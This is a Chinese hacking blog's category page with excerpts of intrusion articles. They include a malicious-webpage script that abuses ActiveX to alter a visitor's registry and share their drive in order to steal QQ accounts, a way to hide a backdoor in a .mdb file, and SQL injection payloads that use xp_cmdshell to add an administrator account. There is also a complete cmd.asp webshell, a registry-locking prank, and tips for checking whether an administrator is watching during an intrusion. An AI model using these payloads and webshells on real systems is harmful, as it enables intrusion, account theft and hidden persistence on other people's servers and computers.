分类 ‘技术文章’ 下的日志

黑客通过网页窃取QQ方法解析

  要想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Lan 阅读全文 »

巧妙利用.mdb后缀数据库做后门

作者:FireFox [F.S.T] 来源:火狐技术联盟 www.wrsky.com

引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。

我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 + 文件名/参数 生成文件名
这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到
阅读全文 »

Tags: ,

SQL Server提升权限相关命令及防范

;exec master..xp_cmdshell "net user name password /add"–
;exec master..xp_cmdshell "net localgroup administrators name /add"–

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select 阅读全文 »

Tags: ,

对蓝盾主站的一次安全性检测

作者: nvymask 来源:www.landun.org

前几天正准备加入蓝盾,所以在他们的BBS上面贴了贴子,没想到天浪竟然同意了。既然同意了,就算是蓝盾的人了。为了我们自已网站的安全性,所以决定对网站进行一次安全性检测。

首先,我知道这肯定是租用的虚拟主机。从主机本身的漏洞而言,相信他们公司自已的人应该做得很好。所以我没有选择对主机入手,而是着手于WEB CGI程序。我先看了看BBS,是动网的BBS。现在版本已经比较高了,可以说程序本身没什么漏洞,看看数据库,也已经改了名了http://www.landun.org/bbs/data/ ,返回的响应码是403,数据库的文件夹名没有改(在这里,返回的响应码403的意思是拒绝访问,一般对目录的访问都是拒绝的,如果是404的话就是文件夹或文件不存在)。不过我在WAWA的论坛上看到他说可以直接改任意用户的密码。但本人对ASP不是太 阅读全文 »

整蛊之注册表终极操作

作者: 风泽[E.S.T]  来源:http://evilhsu.neeao.com/

你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?HOHO~~很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:

修改[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]下的DisableRegistryTools值为1
解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………

今天我就教大家写个程序来实现另类锁定,哈哈~~是不是很好奇了?跟我来。

实验环境:windows2000
实验目的:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)
实现方法:C程序

首先我们要按照Crac 阅读全文 »

Tags:

终端错误信息原因以及解决办法

来源:江苏大学信息安全协会

由于在数据加密中存在错误,此会话将结束。请尝试重新连接到远程计算机。

原因: 数据加密为在网络连接上进行数据传输提供了安全性。数据加密错误可能出于安全原因结束会话。

解决方案: 尝试重新连接到远程计算机。加密策略可能在系统和域之间变化。如果仍旧看到该错误信息,请与服务器管理员联系。

远程连接已超时。请尝试重新连接到远程计算机。

原因: 因为您没有在响应的时间限定设置范围内发出响应,所以终端服务器将中断会话。

解决方案: 尝试重新连接到终端服务器。如果收到此错误信息,请在稍后尝试重新连接。如果仍旧收到此错误信息,请与服务器管理员联系。

原因: 由于网络通信量过大引起的网络连接过慢,引起对终端服务器的响应延迟。

解决方案: 尝试重新连接到终端服务器。如果收到此错误信息,请在稍后尝试重新连接。如果仍旧收到此错误信息,请与服务器管理员联系。
阅读全文 »

Tags:

关于一句话木马

来源:http://home.86hy.com/

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
阅读全文 »

Tags:

如何判定管理员是否在线

来源:华西黑客联盟

随着网络黑客工具的简单化和傻瓜化,越来越多的网络爱好者可以通过现成的攻击工具轻松的入侵主机,然而谁也不想在管理员的眼皮底下做入侵,所以在入侵成功以后,一个很重要的事情是:你能不能确认你的行为在别人的监视之下?所以我们首先要知道管理员是不是现在正在你入侵的主机上?
如何判定管理员在线,我们要知道的是管理员是通过什么方式管理主机的:是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登陆···
一、对于用第三方的控屏工具(pcanywhere、vnc、DameWar等),你只要看相应端口有没有状态为"ESTABLISHED"的连接。一个netstat -an就可以知道,如果想查看与端口相关的进程,使用Fport.exe就可以了。比如我们在一台主机上使用netstat -an发现如下的信息:
Active Connections
阅读全文 »